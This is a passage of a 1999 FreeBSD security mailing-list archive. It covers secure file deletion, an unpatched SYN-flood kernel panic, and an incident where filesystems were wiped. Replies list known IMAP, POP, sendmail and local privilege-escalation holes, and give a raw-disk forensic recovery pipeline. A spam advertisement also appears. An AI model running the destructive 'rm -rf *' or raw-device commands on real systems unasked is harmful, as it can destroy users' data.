Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id QAA08832; Wed, 19 May 1999 16:01:45 +0400 (MSD)
Date: Wed, 19 May 1999 16:01:45 +0400 (MSD)
From: "Ilmar S. Habibulin" To: posix1e@cyrus.watson.org, freebsd-security@freebsd.org Subject: secure deletion Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org May be it's an freebsd-fs@ question, but i think that it belings here to. I heard that some linux fs (maybe extfs2?) have some secure deletion flag, which being set on inode(file or dir) cause content of this file to be wiped before deletion, so even if somebody manage to restore file, its content would be unusable. I think, that it is nice feature, and i would like to see it in freebsd. What would you say? PS. I have implementation of this feature for freebsd-2.2.5. May be i can port it to 3.x. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 6:57:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 0AABA154D9 for ; Wed, 19 May 1999 06:57:33 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id KAA14946; Wed, 19 May 1999 10:57:08 -0300 (GMT) 
From: Fernando Schapachnik
Message-Id: <199905191357.KAA14946@ns1.sminter.com.ar>
Subject: Re: Is 3.2-R safe?
In-Reply-To: <4.2.0.37.19990518110133.00b58da0@localhost> from Brett Glass at "May 18, 99 11:09:12 am"
To: brett@lariat.org (Brett Glass)
Date: Wed, 19 May 1999 10:57:08 -0300 (GMT)
Cc: security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In an earlier message, Brett Glass wrote:
> Has the "double free" problem that causes the system to crash under a
> SYN flood attack been fixed?
[...]

On the same line: was the VM bug that was triggered by the screensaver fixed?

Regards!

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA

From owner-freebsd-security Wed May 19 13:39:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 40EC614CF2 for ; Wed, 19 May 1999 13:39:35 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA63615; Wed, 19 May 1999 14:38:27 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA01429; Wed, 19 May 1999 14:38:19 -0600 (MDT)
Message-Id: <199905192038.OAA01429@harmony.village.org>
To: Brett Glass
Subject: Re: Is 3.2-R safe?
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Tue, 18 May 1999 11:09:12 MDT." <4.2.0.37.19990518110133.00b58da0@localhost>
References: <4.2.0.37.19990518110133.00b58da0@localhost>
Date: Wed, 19 May 1999 14:38:19 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <4.2.0.37.19990518110133.00b58da0@localhost> Brett Glass writes:
: Just saw the announcement of 3.2-R. We'd been planning to migrate
: some of our systems to this version, but before we install, we need
: to know: Has the "double free" problem that causes the system to
: crash under a SYN flood attack been fixed?

I don't recall a "fix" for this going into -current, let alone -stable. It all came to light very late in the 3.2 game, and nobody posted a good patch, as far as I can recall. The one patch that was posted was panned as being bad. I had planned on setting up a 3.2R system to see if this, and a small list of other problems, has been fixed or not.

Warner

From owner-freebsd-security Wed May 19 13:42:35 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id C496614CF2 for ; Wed, 19 May 1999 13:42:32 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA63631; Wed, 19 May 1999 14:41:23 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA01463; Wed, 19 May 1999 14:41:14 -0600 (MDT)
Message-Id: <199905192041.OAA01463@harmony.village.org>
To: "Ilmar S. Habibulin"
Subject: Re: secure deletion
Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Wed, 19 May 1999 16:01:45 +0400."
References:
Date: Wed, 19 May 1999 14:41:14 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message "Ilmar S. Habibulin" writes:
: Maybe it's a freebsd-fs@ question, but I think that it belongs here too.
: I heard that some Linux fs (maybe extfs2?) has a secure deletion flag,
: which, being set on an inode (file or dir), causes the content of this file to be
: wiped before deletion, so even if somebody manages to restore the file, its
: content would be unusable. I think that it is a nice feature, and I would
: like to see it in FreeBSD. What would you say?
:
: PS. I have an implementation of this feature for freebsd-2.2.5. Maybe I can
: port it to 3.x.

Does it do the DoD recommended pattern of deletion? That is, overwrite the blocks with several different series of bit patterns to make it impossible to recover using the usual techniques, or is it just a bzero of the blocks in question? The former is secure deletion, the latter is too insecure for most people that want this feature...

Warner

P.S. I do think a port of even the latter would be a good thing.

From owner-freebsd-security Wed May 19 16:24:54 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 8569C157D2 for ; Wed, 19 May 1999 16:24:50 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA19752; Wed, 19 May 1999 17:24:43 -0600 (MDT)
Message-Id: <4.2.0.37.19990519171457.045fc350@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Wed, 19 May 1999 17:17:20 -0600
To: Warner Losh
From: Brett Glass
Subject: Re: Is 3.2-R safe?
Cc: security@FreeBSD.ORG
In-Reply-To: <199905192038.OAA01429@harmony.village.org>
References: <4.2.0.37.19990518110133.00b58da0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In that case, it probably still needs fixing. What concerns me is that this error may be triggered by other things besides just SYN floods. Any heavy load might do it. And then, you'll get kernel panics. Not good.

I'd like to do the patch, but I'm not up on the mysteries of that particular part of the kernel -- and the source isn't exactly well commented. Who is the person who has most recently tinkered with that code?

--Brett Glass

>I don't recall a "fix" for this going into -current, let alone
>-stable. It all came to light very late in the 3.2 game, and nobody
>posted a good patch, as far as I can recall. The one patch that was
>posted was panned as being bad. I had planned on setting up a 3.2R
>system to see if this, and a small list of other problems, has been
>fixed or not.
>
>Warner

From owner-freebsd-security Wed May 19 21: 6:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from tyr.agrknives.com (tyr.hos.net [205.238.129.41]) by hub.freebsd.org (Postfix) with ESMTP id E4B6214C83 for ; Wed, 19 May 1999 21:06:53 -0700 (PDT) (envelope-from arussell@tyr.agrknives.com)
Received: (from arussell@localhost) by tyr.agrknives.com (8.8.8/8.8.8) id XAA16431 for freebsd-security@freebsd.org; Wed, 19 May 1999 23:03:26 -0500 (CDT) (envelope-from arussell)
From: "Andrew G. Russell" Message-Id: <199905200403.XAA16431@tyr.agrknives.com> Subject: attack or failure To: freebsd-security@freebsd.org Date: Wed, 19 May 1999 23:03:26 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Last night, a system that has been running FreeBSD 2.1.5 for a number of years with the last upgrade being sendmail 8.8.4 being added. Three filesystems were cleared out, I don't know if newfs or rm -rf * were used on them. the filesystems were /x(local/src/obj...) /var /tmp the of course covers up the track quite nicely. the mod times on /tmp is May 18 21:09, on /var May 18 21:09 and on /x May 18 21:33 this being an old system, when I could not get at the /x filesystem, I rebooted. This system will be upgraded to 2.2.8, but I sure would like some clue as to how it happened. Thanks in advance for any help/thoughts. A.G. Russell To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 21:22:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 198E714D1A for ; Wed, 19 May 1999 21:22:52 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Wed, 19 May 1999 22:22:48 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma019804; Wed, 19 May 99 22:22:41 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id WAA15649; Wed, 19 May 1999 22:22:03 -0600 (MDT) Date: Wed, 19 May 1999 22:22:02 -0600 (MDT) 
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
To: "Andrew G. Russell"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: attack or failure
In-Reply-To: <199905200403.XAA16431@tyr.agrknives.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 19 May 1999, Andrew G. Russell wrote:

> This system will be upgraded to 2.2.8, but I sure would like some clue as
> to how it happened.

Were you running a POP or IMAP server? If so, what version? There are well-known and quite easily exploited holes in the University of Washington IMAP2bis and IMAP4 servers and the Qualcomm POP server, and exploits are publicly available and in widespread use. Each exploit gives a remote attacker an instant root shell on your system.

You mention using sendmail 8.8.4, which I also recall had an exploitable buffer overflow in the MIME decoding code, which in theory could also be a possible avenue of remote attack, though I am not aware of any public exploits for this hole.

Now if the attack could have been initiated locally by a user with shell access on your system, there are many other known holes in versions of FreeBSD as old as 2.1.5, such as the suidperl buffer overflow, the rdist buffer overflow, the procfs hole, or the lpr buffer overflow, to name a few.

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Wed May 19 21:25:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id F3B0B14E1B for ; Wed, 19 May 1999 21:25:31 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id VAA04682; Wed, 19 May 1999 21:23:48 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id VAA06832; Wed, 19 May 1999 21:23:48 -0700
Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA19650; Wed, 19 May 99 21:23:41 PDT
Message-Id: <37438E4C.4B95B937@softweyr.com>
Date: Wed, 19 May 1999 22:23:40 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: Warner Losh
Cc: "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
References: <199905192041.OAA01463@harmony.village.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Warner Losh wrote:
>
> In message "Ilmar S. Habibulin" writes:
> : Maybe it's a freebsd-fs@ question, but I think that it belongs here too.
> : I heard that some Linux fs (maybe extfs2?) has a secure deletion flag,
> : which, being set on an inode (file or dir), causes the content of this file to be
> : wiped before deletion, so even if somebody manages to restore the file, its
> : content would be unusable. I think that it is a nice feature, and I would
> : like to see it in FreeBSD. What would you say?
> :
> : PS. I have an implementation of this feature for freebsd-2.2.5. Maybe I can
> : port it to 3.x.
>
> Does it do the DoD recommended pattern of deletion? That is, overwrite
> the blocks with several different series of bit patterns to make it
> impossible to recover using the usual techniques, or is it just a
> bzero of the blocks in question? The former is secure deletion, the
> latter is too insecure for most people that want this feature...

The standard used to be 100 overwrites of 0xe5 then 0x5e, but they changed the standard just as I was leaving the defense industry in 1991. Does Posix or SUS have anything to say about this?

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                      Softweyr LLC
http://www.softweyr.com/~softweyr               wes@softweyr.com

From owner-freebsd-security Wed May 19 22:19:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from portao.jornaldobrasil.com.br (portao.jornaldobrasil.com.br [200.229.231.66]) by hub.freebsd.org (Postfix) with SMTP id 4502614C56 for ; Wed, 19 May 1999 22:19:13 -0700 (PDT) (envelope-from remove@hitsubmitter.com)
Received: from i199-1.orl-fl.oltronics.net by portao.jornaldobrasil.com.br (AIX 4.1/UCB 5.64/4.03) id AA43014; Thu, 20 May 1999 03:27:03 -0200
Date: Thu, 20 May 1999 03:27:03 -0200
Message-Id: <9905200527.AA43014@portao.jornaldobrasil.com.br>
From: "D.Reynolds" To: Reply-To: remove@hitsubmitter.com Subject: "FREE DOWNLOAD" Register Your Web Site On Over 900+ Search Engines "INSTANTLY" Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To remove your name from our mailing list immediately, please refer to the statement at the bottom of this message. ====================================================================== "FREE DOWNLOAD".Register Your Web Site To Over 900+ Search Engines "Instantly". Latest Version 5.00 Just released Today! I would like to inform you about a new, and exciting award winning product that will save you both countless hours, and increase your exposure on the Internet immeasurably! Known as the Submission Wizard our program offers web users such as yourself, the ability to automatically submit your site to over 900+ search engines in just one session . Select from different categories, even countries, the choice is yours. The submission process is very simple, efficient, and most importantly fast. All you do is provide standard site information i.e. site name, address, description, and a few well chosen keywords. The Submission Wizard takes this information, and changes it into the format required by each different engine, then registers your web site. It's that simple! In addition, the Wizard's database of search engines and directories is constantly being updated every week, thus giving your site fresh and relevant exposure. Also the Wizard allows you to register multiple URL's. Just imagine the possibilities! Take charge of your web exposure, try out the Submission Wizard demo FREE by following the provided hyperlink. We know you'll be as excited about it as much as we are! 
For your "FREE DOWNLOAD" visit our site at www.hitsubmitter.com ======================================================== HOW TO GET YOUR BUSINESS TO #1 On The Seach Engines SEARCH ENGINE POSITIONING Want to see where your company is positioned on the search engines, then download a "free working copy" of our positioning software, 1.Generates HTML pages designed to rank near the top of the search results. 2.Analyzes your existing Web pages and gives plain-English advice on how to improve them. 3.Includes a simple, built-in HTML editor for fast and easy changes. 4.Assists in uploading your new and changed pages. 5.Submits your pages to the major search engines automatically. 6.Reports your positions on each search engine for each keyword you are targeting. 7.Tracks the number of visitors to your site, where they came from, and what keywords they used to find you. 8.And much, much more! Get you free download from WWW.hitsubmitter.com =========================================================== Thank you for your time, and good luck with your web promotion. D.Reynolds Customer Services. We are currently consolidating our many mailing lists and need to update our databases. Our records indicate that you may have inquired in the past. If this is not the case, please reply with "REMOVE" in the subject field to never receive email offers from this vendor. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 22:47:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id C823F14C83 for ; Wed, 19 May 1999 22:47:44 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from lal.cs.utah.edu (lal.cs.utah.edu [155.99.195.65]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id XAA00102; Wed, 19 May 1999 23:46:23 -0600 (MDT) 
From: David G Andersen
Received: (from danderse@localhost) by lal.cs.utah.edu (8.8.8/8.8.8) id XAA18509; Wed, 19 May 1999 23:46:21 -0600 (MDT)
Message-Id: <199905200546.XAA18509@lal.cs.utah.edu>
Subject: Re: attack or failure
To: arussell@tyr.agrknives.com (Andrew G. Russell)
Date: Wed, 19 May 1999 23:46:21 -0600 (MDT)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199905200403.XAA16431@tyr.agrknives.com> from "Andrew G. Russell" at May 19, 99 11:03:26 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Before you create/touch/break anything on your filesystems, you'll most likely want to 'strings' the raw filesystem device and pipe it through either grep, or a little perl script, to look for syslog patterns. I've used it a few times in case of emergency (like the one you've described), and it tends to pick out most of the interesting syslog entries.

Stick a floppy in, and do:

    strings /dev/sd0c | ./findsysl > /dev/fd0

(where findsysl is something like:

    #!/usr/bin/perl
    # Print every line that begins with a syslog timestamp ("Mmm dd HH:MM:SS ").
    while (<>) {
        if (/^[A-Z][a-z][a-z] +\d+ \d\d:\d\d:\d\d /) {
            print;
        }
    }

Or pipe to 'more' to see if it's getting anything interesting. _don't_ cat it to the filesystem, because it'll clobber old data.

More sophisticated recovery techniques exist, if there's anything critical on the system or you really want to find out what's going on. This'll get you 90% of what's there with little effort, though.

-Dave

Lo and behold, Andrew G. Russell once said:
>
> Last night, a system that has been running FreeBSD 2.1.5 for a number of
> years, with the last upgrade being sendmail 8.8.4 being added.
>
> Three filesystems were cleared out; I don't know if newfs or rm -rf * were
> used on them.
>
> The filesystems were /x (local/src/obj...) /var /tmp.
> That of course covers up the tracks quite nicely.
>
> The mod times on /tmp are May 18 21:09, on /var May 18 21:09 and on /x
> May 18 21:33.
>
> This being an old system, when I could not get at the /x filesystem, I rebooted.
>
> This system will be upgraded to 2.2.8, but I sure would like some clue as
> to how it happened.
>
> Thanks in advance for any help/thoughts.
>
> A.G. Russell
>

--
work: danderse@cs.utah.edu                  me: angio@pobox.com
University of Utah                          http://www.angio.net/
Computer Science - Flux Research Group      "What's footnote FIVE?"

From owner-freebsd-security Wed May 19 22:59:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id CA36515266 for ; Wed, 19 May 1999 22:59:45 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru)
Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id JAA06264; Thu, 20 May 1999 09:59:42 +0400 (MSD)
Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id JAA18006; Thu, 20 May 1999 09:59:40 +0400 (MSD)
Date: Thu, 20 May 1999 09:59:40 +0400 (MSD)
From: "Ilmar S. Habibulin" To: Warner Losh Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <199905192041.OAA01463@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 19 May 1999, Warner Losh wrote: > Does it doe the DoD recommended patter of deletion? That is overwrite > the blocks with sever different series of bit patterns to make it > impossible to recover using the usual techniques, or is it just a > bzero of the blocks in question? The former is secure deletion, the > latter is too insecure for most people that want this feature... Bzero can be changed to some other function, is suppose that this is not a question. The question is if this thing is needed by comunity. > P.S. I do think a port of even the latter would be a good thing. So you vote for it. ;-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 23:25:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 1219114E66 for ; Wed, 19 May 1999 23:25:32 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA64678; Thu, 20 May 1999 00:24:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA04145; Thu, 20 May 1999 00:24:20 -0600 (MDT) Message-Id: <199905200624.AAA04145@harmony.village.org> To: "Ilmar S. Habibulin" Subject: Re: secure deletion Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 20 May 1999 09:59:40 +0400." 
References:
Date: Thu, 20 May 1999 00:24:19 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message "Ilmar S. Habibulin" writes:
: Bzero can be changed to some other function; I suppose that this is not a
: question. The question is if this thing is needed by the community.

There is a certain segment of the community that would use it. If there was zero overhead (beyond a bit compare on unlink) when not used, binary compatible with current disks and a fairly clean implementation, then I think that there would be support for its inclusion.

Warner

From owner-freebsd-security Wed May 19 23:42:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from firewall.reed.wattle.id.au (darren2.lnk.telstra.net [139.130.53.33]) by hub.freebsd.org (Postfix) with ESMTP id 792C014E7D for ; Wed, 19 May 1999 23:42:23 -0700 (PDT) (envelope-from darrenr@reed.wattle.id.au)
Received: (from root@localhost) by firewall.reed.wattle.id.au (8.9.1/8.8.7) id GAA20493; Thu, 20 May 1999 06:42:20 GMT
Received: from avalon.reed.wattle.id.au(192.168.1.1) by firewall.reed.wattle.id.au via smap (V1.3) id sma020491; Thu May 20 06:42:19 1999
Received: from percival.reed.wattle.id.au. (percival.reed.wattle.id.au [192.168.1.5]) by avalon.reed.wattle.id.au (8.9.0.Beta3/8.9.0.Beta3) with SMTP id QAA11368; Thu, 20 May 1999 16:42:19 +1000 (EST)
From: Darren Reed
Message-Id: <199905200642.QAA11368@avalon.reed.wattle.id.au>
Subject: Re: secure deletion
In-Reply-To: <37438E4C.4B95B937@softweyr.com> from Wes Peters at "May 19, 99 10:23:40 pm"
To: wes@softweyr.com (Wes Peters)
Date: Thu, 20 May 1999 16:42:18 +1000 (EST)
Cc: imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL37 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some email I received from Wes Peters, sie wrote:
> Warner Losh wrote:
> >
> > In message "Ilmar S. Habibulin" writes:
> > : Maybe it's a freebsd-fs@ question, but I think that it belongs here too.
> > : I heard that some Linux fs (maybe extfs2?) has a secure deletion flag,
> > : which, being set on an inode (file or dir), causes the content of this file to be
> > : wiped before deletion, so even if somebody manages to restore the file, its
> > : content would be unusable. I think that it is a nice feature, and I would
> > : like to see it in FreeBSD. What would you say?
> > :
> > : PS. I have an implementation of this feature for freebsd-2.2.5. Maybe I can
> > : port it to 3.x.
> >
> > Does it do the DoD recommended pattern of deletion? That is, overwrite
> > the blocks with several different series of bit patterns to make it
> > impossible to recover using the usual techniques, or is it just a
> > bzero of the blocks in question? The former is secure deletion, the
> > latter is too insecure for most people that want this feature...
>
> The standard used to be 100 overwrites of 0xe5 then 0x5e, but they
> changed the standard just as I was leaving the defense industry in
> 1991. Does Posix or SUS have anything to say about this?
I'd worry about this sort of thing when and if FreeBSD is ever used for storing of (officially) classified/confidential material and even then, the solution is likely to be to take a hammer or drill to the disks.

For normal users, who are very unlikely to have any worries about someone doing an in-depth magnetic scan of their disk, a single overwrite will be just as effective as 100.

Let's try being a little realistic, eh ?

Darren

From owner-freebsd-security Wed May 19 23:49:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mta1-rme.xtra.co.nz (mta.xtra.co.nz [203.96.92.1]) by hub.freebsd.org (Postfix) with ESMTP id 2D06D14E7D for ; Wed, 19 May 1999 23:49:44 -0700 (PDT) (envelope-from junkmale@pop3.xtra.co.nz)
Received: from wocker ([210.55.152.50]) by mta1-rme.xtra.co.nz (InterMail v04.00.02.07 201-227-108) with SMTP id <19990520065202.IDMD7869945.mta1-rme@wocker>; Thu, 20 May 1999 18:52:02 +1200
From: "Dan Langille" Organization: The FreeBSD Diary To: Darren Reed Date: Thu, 20 May 1999 18:49:40 +1200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: secure deletion Reply-To: junkmale@xtra.co.nz Cc: freebsd-security@FreeBSD.ORG In-reply-to: <199905200642.QAA11368@avalon.reed.wattle.id.au> References: <37438E4C.4B95B937@softweyr.com> from Wes Peters at "May 19, 99 10:23:40 pm" X-mailer: Pegasus Mail for Win32 (v3.01d) Message-Id: <19990520065202.IDMD7869945.mta1-rme@wocker> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 20 May 99, at 16:42, Darren Reed wrote: > I'd worry about this sort of thing when and if FreeBSD is ever used for > storing of (officially) classified/confidential material and even then, > the solution is likely to be to take a hammer or drill to the disks. I know of at least one government department which drills through the platters when disposing of a disk drive. -- Dan Langille - DVL Software Limited The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 0:33: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 24EEE14FFF for ; Thu, 20 May 1999 00:33:06 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id LAA09659; Thu, 20 May 1999 11:33:05 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id LAA20546; Thu, 20 May 1999 11:33:04 +0400 (MSD) Date: Thu, 20 May 1999 11:33:04 +0400 (MSD) 
From: "Ilmar S. Habibulin" To: Warner Losh Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <199905200624.AAA04145@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 20 May 1999, Warner Losh wrote:

> There is a certain segment of the community that would use it. If
> there was zero overhead (beyond a bit compare on unlink) when not
> used, binary compatible with current disks and a fairly clean
> implementation, then I think that there would be support for its
> inclusion.

My implementation was very simple. In order to secure ;-) delete a file, the user has to set a special flag (bit) of the inode. I think that I can use the ufs flags field for that bit and the chflags command. When I catch the situations of unlinking a file or truncating its size, I bzero the unused blocks.

While unlinking I found a strange thing. I'm deleting blocks sequentially from low blkno to high. If I change this sequence back to front (?) I've got no bzero'ed blocks at all. Maybe there is some other way of wiping blocks?

From owner-freebsd-security Thu May 20 1:37:23 1999
Delivered-To: freebsd-security@freebsd.org Received: from hydrogen.fircrest.net (metriclient-2.uoregon.edu [128.223.172.2]) by hub.freebsd.org (Postfix) with ESMTP id EF3C414EBD for ; Thu, 20 May 1999 01:37:16 -0700 (PDT) (envelope-from gurney_j@efn.org) Received: (from jmg@localhost) by hydrogen.fircrest.net (8.9.1/8.8.7) id BAA08176; Thu, 20 May 1999 01:36:57 -0700 (PDT) Message-ID: <19990520013657.62702@hydrogen.nike.efn.org> Date: Thu, 20 May 1999 01:36:57 -0700
From: John-Mark Gurney To: David G Andersen Cc: "Andrew G. Russell" , freebsd-security@FreeBSD.ORG Subject: Re: attack or failure References: <199905200403.XAA16431@tyr.agrknives.com> <199905200546.XAA18509@lal.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: <199905200546.XAA18509@lal.cs.utah.edu>; from David G Andersen on Wed, May 19, 1999 at 11:46:21PM -0600 Reply-To: John-Mark Gurney Organization: Cu Networking X-Operating-System: FreeBSD 3.0-RELEASE i386 X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4 X-Files: The truth is out there X-URL: http://resnet.uoregon.edu/~gurney_j/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

David G Andersen scribbled this message on May 19:
